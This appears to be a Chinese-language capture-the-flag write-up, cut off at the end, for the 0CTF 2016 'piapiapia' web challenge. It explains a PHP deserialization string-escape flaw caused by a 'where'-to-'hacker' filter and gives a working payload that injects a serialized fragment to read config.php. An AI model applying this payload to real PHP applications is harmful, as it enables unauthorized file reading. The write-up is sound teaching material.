{"id":205,"date":"2026-06-01T19:49:47","date_gmt":"2026-06-01T11:49:47","guid":{"rendered":"https:\/\/asum1.fun\/?p=205"},"modified":"2026-06-02T10:32:45","modified_gmt":"2026-06-02T02:32:45","slug":"ctf%c2%b2-0ctf-2016piapiapia","status":"publish","type":"post","link":"https:\/\/asum1.fun\/index.php\/2026\/06\/01\/ctf%c2%b2-0ctf-2016piapiapia\/","title":{"rendered":"CTF\u00b2-[0CTF 2016]piapiapia"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u770b\u5230\u4e00\u4e2a\u767b\u5f55\u6846\uff0c\u8bd5\u4e00\u4e0bsql\u6ce8\u5165\uff0c\u5c1d\u8bd5\u65e0\u679c\u5f00\u59cb\u626b\u76ee\u5f55<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-1024x611.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"611\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-1024x611.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-206\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u770b\u4e00\u773crobots.txt\uff0c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-1.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"666\" height=\"267\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-207\"  sizes=\"auto, (max-width: 666px) 100vw, 666px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-2.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"747\" height=\"282\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-208\"  sizes=\"auto, (max-width: 747px) 100vw, 747px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ca1\u4e1c\u897f\uff0c\u63a5\u7740\u8bd5\u4e86\u4e0bwww.zip\u62ff\u5230\u6e90\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-3-1024x473.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"473\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-3-1024x473.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-209\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5feb\u901f\u6d4f\u89c8\u4e00\u904d\u5f97\u77e5flag\u5728config.php\u91cc\u9762\uff0c\u8fd9\u9898\u5e94\u8be5\u662f\u8981\u6587\u4ef6\u8bfb\u53d6config.php<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-4.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"558\" height=\"381\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-4.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-210\" style=\"width:558px;height:auto\"  sizes=\"auto, (max-width: 558px) 100vw, 558px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u610f\u5230profile.php\u4e2d\u542b\u6709file_get_contents()<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/profile.php\n&lt;?php  \n\trequire_once('class.php');     \/\/\u5185\u90e8\u6709\u4ee3\u7801\u4f1a\u7528\u5230class.php\u7684\u51fd\u6570\n\tif($_SESSION&#91;'username'] == null) {\n\t\tdie('Login First');\t\n\t}\n\t$username = $_SESSION&#91;'username'];\n\t$profile=$user-&gt;show_profile($username);\n\tif($profile  == null) {\n\t\theader('Location: update.php');\n\t}\n\telse {\n\t\t$profile=unserialize($profile);\n\t\t$phone = $profile&#91;'phone'];\n\t\t$email = $profile&#91;'email'];\n\t\t$nickname = $profile&#91;'nickname'];\n\t\t$photo = base64_encode(file_get_contents($profile&#91;'photo']));   \/\/\u51fa\u73b0file_get_contents()\n?&gt;\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n   &lt;title&gt;Profile&lt;\/title&gt;\n   &lt;link href=\"static\/bootstrap.min.css\" rel=\"stylesheet\"&gt;\n   &lt;script src=\"static\/jquery.min.js\"&gt;&lt;\/script&gt;\n   &lt;script src=\"static\/bootstrap.min.js\"&gt;&lt;\/script&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n\t&lt;div class=\"container\" style=\"margin-top:100px\"&gt;  \n\t\t&lt;img src=\"data:image\/gif;base64,&lt;?php echo $photo; ?&gt;\" class=\"img-memeda \" style=\"width:180px;margin:0px auto;\"&gt;\n\t\t&lt;h3&gt;Hi &lt;?php echo $nickname;?&gt;&lt;\/h3&gt;\n\t\t&lt;label&gt;Phone: &lt;?php echo $phone;?&gt;&lt;\/label&gt;\n\t\t&lt;label&gt;Email: &lt;?php echo $email;?&gt;&lt;\/label&gt;\n\t&lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n&lt;?php\n\t}\n?&gt;\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u770b\u4e00\u4e0b$profile[&#8216;photo&#8217;]\u662f\u4ece\u54ea\u91cc\u6765\u7684<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>$profile=$user-&gt;show_profile($username); $profile=unserialize($profile);<\/code> <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f00\u5934\u6709\u4e2arequire_once(&#8216;class.php&#8217;); \uff0c\u6211\u4eec\u53bbclass.php\u770b\u770bshow_profile()\u662f\u600e\u4e48\u5b9a\u4e49\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/class.php\n&lt;?php\nrequire('config.php');\n\nclass user extends mysql{\n\tprivate $table = 'users';\n\n\tpublic function is_exists($username) {\n\t\t$username = parent::filter($username);\n\n\t\t$where = \"username = '$username'\";\n\t\treturn parent::select($this-&gt;table, $where);\n\t}\n\tpublic function register($username, $password) {\n\t\t$username = parent::filter($username);\n\t\t$password = parent::filter($password);\n\n\t\t$key_list = Array('username', 'password');\n\t\t$value_list = Array($username, md5($password));\n\t\treturn parent::insert($this-&gt;table, $key_list, $value_list);\n\t}\n\tpublic function login($username, $password) {\n\t\t$username = parent::filter($username);\n\t\t$password = parent::filter($password);\n\n\t\t$where = \"username = '$username'\";\n\t\t$object = parent::select($this-&gt;table, $where);\n\t\tif ($object &amp;&amp; $object-&gt;password === md5($password)) {\n\t\t\treturn true;\n\t\t} else {\n\t\t\treturn false;\n\t\t}\n\t}\n\tpublic function show_profile($username) {       \/\/ciallo\uff0c\u5728\u8fd9\u91cc\n\t\t$username = parent::filter($username);    \/\/filter\u5728\u4e0b\u9762mysql\u5b9a\u4e49\u4e86\n\n\t\t$where = \"username = '$username'\";\n\t\t$object = parent::select($this-&gt;table, $where);     \/\/select\u4e5f\u5728\u4e0b\u9762\u5b9a\u4e49\n\t\treturn $object-&gt;profile;\n\t}\n\tpublic function update_profile($username, $new_profile) {\n\t\t$username = parent::filter($username);\n\t\t$new_profile = parent::filter($new_profile);\n\n\t\t$where = \"username = '$username'\";\n\t\treturn parent::update($this-&gt;table, 'profile', $new_profile, $where);\n\t}\n\tpublic function __tostring() {\n\t\treturn __class__;\n\t}\n}\n\nclass mysql {\n\tprivate $link = null;\n\n\tpublic function connect($config) {\n\t\t$this-&gt;link = mysql_connect(\n\t\t\t$config&#91;'hostname'],\n\t\t\t$config&#91;'username'], \n\t\t\t$config&#91;'password']\n\t\t);\n\t\tmysql_select_db($config&#91;'database']);\n\t\tmysql_query(\"SET sql_mode='strict_all_tables'\");\n\n\t\treturn $this-&gt;link;\n\t}\n\n\tpublic function select($table, $where, $ret = '*') {\n\t\t$sql = \"SELECT $ret FROM $table WHERE $where\";\n\t\t$result = mysql_query($sql, $this-&gt;link);\n\t\treturn mysql_fetch_object($result);\n\t}\n\n\tpublic function insert($table, $key_list, $value_list) {\n\t\t$key = implode(',', $key_list);\n\t\t$value = '\\'' . implode('\\',\\'', $value_list) . '\\''; \n\t\t$sql = \"INSERT INTO $table ($key) VALUES ($value)\";\n\t\treturn mysql_query($sql);\n\t}\n\n\tpublic function update($table, $key, $value, $where) {\n\t\t$sql = \"UPDATE $table SET $key = '$value' WHERE $where\";\n\t\treturn mysql_query($sql);\n\t}\n\n\tpublic function filter($string) {                   \n\t\t$escape = array('\\'', '\\\\\\\\');\n\t\t$escape = '\/' . implode('|', $escape) . '\/';\n\t\t$string = preg_replace($escape, '_', $string);\n\n\t\t$safe = array('select', 'insert', 'update', 'delete', 'where');\n\t\t$safe = '\/' . implode('|', $safe) . '\/i';\n\t\treturn preg_replace($safe, 'hacker', $string);\n\t}\n\tpublic function __tostring() {\n\t\treturn __class__;\n\t}\n}\nsession_start();\n$user = new user();\n$user-&gt;connect($config);\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>filter()<\/strong>\u548c<strong>select()<\/strong>\u5728mysql\u4e2d\u5b9a\u4e49\u4e86\uff0c<strong>select<\/strong>\u4f1a\u53bb\u627e\u5230<code>username = '$username'<\/code> \u7684profile\u6570\u7ec4\uff0c\u800c<strong>filter<\/strong>\u4f1a\u628aprofile\u5f53\u4e2d\u7684&#8217;select&#8217;, &#8216;insert&#8217;, &#8216;update&#8217;, &#8216;delete&#8217;, &#8216;where&#8217;\u5168\u90e8\u8f6c\u6362\u6210&#8217;hacker&#8217;\u9700\u8981\u6ce8\u610f\u7684\u662f<strong>&#8216;where&#8217;\u8f6c&#8217;hacker&#8217;\u662f5\u4e2a\u5b57\u7b26\u8f6c6\u5b57\u7b26\uff0c\u4e3a\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u9003\u9038\u7559\u4e0b\u4e86\u7a7a\u95f4<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u63a5\u7740\u770bprofile\u662f\u5982\u4f55\u4e0a\u4f20\u7684\uff0c\u770b\u5230update.php<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/update.php\n&lt;?php\n\trequire_once('class.php');\n\tif($_SESSION&#91;'username'] == null) {\n\t\tdie('Login First');\t\n\t}\n\tif($_POST&#91;'phone'] &amp;&amp; $_POST&#91;'email'] &amp;&amp; $_POST&#91;'nickname'] &amp;&amp; $_FILES&#91;'photo']) {    \/\/\u4f20\u5165\u56db\u4e2a\u503c\n\n\t\t$username = $_SESSION&#91;'username'];   \n\t\tif(!preg_match('\/^\\d{11}$\/', $_POST&#91;'phone']))                      \/\/\u5339\u914d11\u4f4d\u7684\u53f7\u7801\n\t\t\tdie('Invalid phone');\n\n\t\tif(!preg_match('\/^&#91;_a-zA-Z0-9]{1,10}@&#91;_a-zA-Z0-9]{1,10}\\.&#91;_a-zA-Z0-9]{1,10}$\/', $_POST&#91;'email'])) \/\/\u5339\u914d\u90ae\u7bb1\u683c\u5f0f\n\t\t\tdie('Invalid email');\n\t\t\n\t\tif(preg_match('\/&#91;^a-zA-Z0-9_]\/', $_POST&#91;'nickname']) || strlen($_POST&#91;'nickname']) &gt; 10) \n                                                            \/\/\u53ea\u80fd\u7531\u5b57\u6bcd\u548c\u6570\u5b57\u7ec4\u6210\u5e76\u4e14\u957f\u5ea6\u4e0d\u5f97\u8d85\u8fc710\u4f46\u662f\u53ef\u4ee5\u901a\u8fc7\u4f20\u5165\u6570\u7ec4\u6765\u7ed5\u8fc7\n\t\t\tdie('Invalid nickname');\n\n\t\t$file = $_FILES&#91;'photo'];     \n\t\tif($file&#91;'size'] &lt; 5 or $file&#91;'size'] &gt; 1000000)       \/\/photo\u7684\u5927\u5c0f\u4e0d\u80fd\u5c0f\u4e8e5\u6216\u8005\u5927\u4e8e1000000\n\t\t\tdie('Photo size error');\n\n\t\tmove_uploaded_file($file&#91;'tmp_name'], 'upload\/' . md5($file&#91;'name']));\n\t\t$profile&#91;'phone'] = $_POST&#91;'phone'];\n\t\t$profile&#91;'email'] = $_POST&#91;'email'];\n\t\t$profile&#91;'nickname'] = $_POST&#91;'nickname'];\n\t\t$profile&#91;'photo'] = 'upload\/' . md5($file&#91;'name']);\n\n\t\t$user-&gt;update_profile($username, serialize($profile));      \/\/\u8fd9\u91cc\u5c06\u5e8f\u5217\u5316\u7684profile\u6240\u6709\u6570\u636e\u5e8f\u5217\u5316\u540e\u4f20\u5230\u6570\u636e\u5e93\n\t\techo 'Update Profile Success!&lt;a href=\"profile.php\"&gt;Your Profile&lt;\/a&gt;';\n\t}\n\telse {\n?&gt;\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n   &lt;title&gt;UPDATE&lt;\/title&gt;\n   &lt;link href=\"static\/bootstrap.min.css\" rel=\"stylesheet\"&gt;\n   &lt;script src=\"static\/jquery.min.js\"&gt;&lt;\/script&gt;\n   &lt;script src=\"static\/bootstrap.min.js\"&gt;&lt;\/script&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n\t&lt;div class=\"container\" style=\"margin-top:100px\"&gt;  \n\t\t&lt;form action=\"update.php\" method=\"post\" enctype=\"multipart\/form-data\" class=\"well\" style=\"width:220px;margin:0px auto;\"&gt; \n\t\t\t&lt;img src=\"static\/piapiapia.gif\" class=\"img-memeda \" style=\"width:180px;margin:0px auto;\"&gt;\n\t\t\t&lt;h3&gt;Please Update Your Profile&lt;\/h3&gt;\n\t\t\t&lt;label&gt;Phone:&lt;\/label&gt;\n\t\t\t&lt;input type=\"text\" name=\"phone\" style=\"height:30px\"class=\"span3\"\/&gt;\n\t\t\t&lt;label&gt;Email:&lt;\/label&gt;\n\t\t\t&lt;input type=\"text\" name=\"email\" style=\"height:30px\"class=\"span3\"\/&gt;\n\t\t\t&lt;label&gt;Nickname:&lt;\/label&gt;\n\t\t\t&lt;input type=\"text\" name=\"nickname\" style=\"height:30px\" class=\"span3\"&gt;\n\t\t\t&lt;label for=\"file\"&gt;Photo:&lt;\/label&gt;\n\t\t\t&lt;input type=\"file\" name=\"photo\" style=\"height:30px\"class=\"span3\"\/&gt;\n\t\t\t&lt;button type=\"submit\" class=\"btn btn-primary\"&gt;UPDATE&lt;\/button&gt;\n\t\t&lt;\/form&gt;\n\t&lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n&lt;?php\n\t}\n?&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>$user-&gt;update_profile($username, serialize($profile)); <\/strong> \u4e0a\u4f20\u7684\u6838\u5fc3\u4ee3\u7801\u662f\u8fd9\u6837\uff0c\u56de\u770b\u5230class.php\uff0c\u53d1\u73b0\u8fd9\u91cc\u662f<strong>\u5148\u5c06\u6570\u636e\u5e8f\u5217\u5316<\/strong>\u7136\u540e<strong>\u7ecf\u8fc7filter()<\/strong>\uff0c\u518d\u4f20\u56de\u6570\u636e\u5e93\uff0c\u8fd9\u91cc\u5c31\u5b58\u5728\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u9003\u9038\u7684\u7a7a\u95f4\uff0c\u6211\u4eec\u8fd9\u91cc\u5148\u770b\u4e00\u4e0b\u6b63\u5e38\u7684\u5e8f\u5217\u5316\u7ed3\u679c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$profile&#91;'phone'] = \"12345678990\";\n$profile&#91;'email'] = \"4321@qq.com\";\n$profile&#91;'nickname'] = \"123\";\n$profile&#91;'photo'] = 'upload\/' . md5(\"abc.jpg\");\n\necho serialize($profile);<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51fa\uff1a<code>a:4:{s:5:\"phone\";s:11:\"12345678990\";s:5:\"email\";s:11:\"4321@qq.com\";s:8:\"nickname\";s:3:\"123\";s:5:\"photo\";s:39:\"upload\/75639d4112bb5a157b65bb18136ccd4e\";}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u9700\u8981photo\u7684\u503c\u4e3aconfig.php\uff0c\u6240\u4ee5\u6784\u9020<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$profile&#91;'phone'] = \"12345678990\";\n$profile&#91;'email'] = \"4321@qq.com\";\n$profile&#91;'nickname'] = \"123\";\n$profile&#91;'photo'] = \"config.php\";\n\necho serialize($profile);<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ed3\u679c\uff1a<code>a:4:{s:5:\"phone\";s:11:\"12345678990\";s:5:\"email\";s:11:\"4321@qq.com\";s:8:\"nickname\";s:3:\"123\";s:5:\"photo\";s:10:\"config.php\";}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u90a3\u4e48nickname\u7684\u672b\u5c3e\u4e00\u5b9a\u662f<code>\";s:5:\"photo\";s:10:\"config.php\";}<\/code> \u8fd9\u6837\u7684\uff0c\u6211\u4eec\u770b\u4e00\u4e0b\u8fd9\u6bb5\u4ee3\u7801\u7684\u957f\u5ea6\uff0c\u4e86\u89e3\u6211\u4eec\u8981\u8865\u591a\u957f\u8fdb\u53bb<code>echo strlen('\";s:5:\"photo\";s:10:\"config.php\";}');<\/code> \u7ed3\u679c\u662f33\uff0c\u6240\u4ee5nickname\u8981\u670933\u4e2awhere\uff0c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$profile&#91;'phone'] = \"12345678990\";\n$profile&#91;'email'] = \"4321@qq.com\";\n$profile&#91;'nickname'] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}';\n$profile&#91;'photo'] = 'upload\/' . md5(\"abc.jpg\");\n\necho serialize($profile);<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51fa\uff1a<code>-\u7701\u7565-21@qq.com\";s:8:\"nickname\";s:198:\"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}\";s:5:\"photo\";s:39:\"upload\/75639d4-\u7701\u7565-<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u628a\u8fd9\u4e2a\u7ed3\u679c\u7ecf\u8fc7filter()\u540e33\u4e2awhere\u53d8\u621033\u4e2ahacker\uff0c\u521a\u597d\u662f198\u4e2a\u5b57\u7b26\uff0c\u540e\u9762\u7684<code>;s:5:\"photo\";s:10:\"config.php\";}<\/code>\u5c31\u9003\u9038\u4e86\u51fa\u6765\uff0c\u5728\u53cd\u5e8f\u5217\u5316\u540e\u5c31\u4f1a\u8ba9photo\u7684\u503c\u53d8\u6210config.php<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6784\u9020\u597d\u540e\uff0c\u6211\u4eec\u6765\u505a\u9898\uff0c\u5148\u8fdb\u5165\/register.php\u968f\u4fbf\u6ce8\u518c\u4e00\u4e2a\u7528\u6237admin\uff0c123<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-5-1024x600.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"600\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-5-1024x600.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-214\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u767b\u5f55<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-6-1024x587.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-6-1024x587.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-215\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-7-1024x705.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"705\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-7-1024x705.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-216\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f20\u5165\u6570\u636e\u540e\u6293\u5305\uff0c\u6539nickname\u4e3anickname[]\u7136\u540e\u4f20\u5165\u6784\u9020\u7684payload\uff1a<code>wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}<\/code>\u4f46\u662f\u8fd9\u6837\u53c8\u4e0d\u884c\u4e86\uff0c\u56e0\u4e3a\u6570\u7ec4\u7684\u5e8f\u5217\u5316\u548c\u5b57\u7b26\u4e32\u7684\u4e0d\u4e00\u6837<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$profile&#91;'phone'] = \"12345678990\";\n$profile&#91;'email'] = \"4321@qq.com\";\n$profile&#91;'nickname']&#91;] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}';\n$profile&#91;'photo'] = 'upload\/' . md5(\"abc.jpg\");\n\necho serialize($profile);<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51fa<code>a:4:{s:5:\"phone\";s:11:\"12345678990\";s:5:\"email\";s:11:\"4321@qq.com\";s:8:\"nickname\";a:1:{i:0;s:198:\"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}\";}s:5:\"photo\";s:39:\"upload\/75639d4112bb5a157b65bb18136ccd4e\";}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6570\u7ec4\u7684\u672b\u5c3e\u4f1a\u591a\u4e00\u4e2a}\uff0c\u6240\u4ee5\u8fd9\u91cc\u8981\u670934\u4e2awhere\uff0c\u540c\u65f6\u8865\u4e0a}\uff0c\u6784\u9020\u4e3a<code><code>where<\/code>wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";}s:5:\"photo\";s:10:\"config.php\";}<\/code><\/p>\n\n\n\n<p 